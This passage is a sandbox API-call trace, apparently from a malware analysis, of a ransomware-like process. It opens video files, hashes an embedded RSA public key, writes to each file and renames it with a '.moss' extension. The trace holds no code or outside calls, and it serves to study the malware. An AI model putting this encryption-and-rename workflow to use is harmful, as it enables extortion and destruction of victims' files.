[0172.675] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.675] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.676] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.676] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.677] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x17bd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.677] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.677] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\1Jhy.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\1jhy.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\1Jhy.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\1jhy.flv.moss")) returned 1 [0172.679] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\FyJx9B3rAO_ V1cS.swf") returned=".swf" [0172.679] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\FyJx9B3rAO_ V1cS.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\fyjx9b3rao_ v1cs.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.679] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=34677) returned 1 [0172.679] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.683] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x874f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.683] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.684] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x8775, lpOverlapped=0x0) returned 1 [0172.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.684] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.684] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.685] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.685] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.686] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.686] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.686] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.686] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.686] GetLastError () returned 0x0 [0172.686] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.686] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.686] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.686] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.686] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.686] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.687] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.687] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.687] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8775, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.687] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.688] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\FyJx9B3rAO_ V1cS.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\fyjx9b3rao_ v1cs.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\FyJx9B3rAO_ V1cS.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\fyjx9b3rao_ v1cs.swf.moss")) returned 1 [0172.689] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\H5st.mp4") returned=".mp4" [0172.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\H5st.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\h5st.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.690] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=11206) returned 1 [0172.690] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.693] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.693] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.694] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x2bc6, lpOverlapped=0x0) returned 1 [0172.695] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.695] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.695] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.695] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.696] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.696] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.696] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.696] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.696] GetLastError () returned 0x0 [0172.696] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.696] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.696] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.696] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.696] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.697] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.697] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.697] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2bc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.697] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.697] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\H5st.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\h5st.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\H5st.mp4.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\h5st.mp4.moss")) returned 1 [0172.699] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\iYED.mp4") returned=".mp4" [0172.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\iYED.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\iyed.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.699] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=31448) returned 1 [0172.699] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.703] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7ab2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.703] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.704] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x7ad8, lpOverlapped=0x0) returned 1 [0172.704] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.704] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.704] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.705] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.705] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.706] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.706] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.706] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.706] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.706] GetLastError () returned 0x0 [0172.706] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.706] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.706] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.706] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.706] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.706] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.706] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.707] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7ad8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.707] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.707] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\iYED.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\iyed.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\iYED.mp4.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\iyed.mp4.moss")) returned 1 [0172.709] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\kCnE4Wx7UWtF P0rfv.mp4") returned=".mp4" [0172.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\Uzo_bgWg\\kCnE4Wx7UWtF P0rfv.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\uzo_bgwg\\kcne4wx7uwtf p0rfv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.709] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=53329) returned 1 [0172.709] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.713] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd02b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.713] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.714] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.714] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xd051, lpOverlapped=0x0) returned 1 [0172.715] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.715] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.715] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.715] lstrlenA (lpString="-----BEGIN PUBLIC 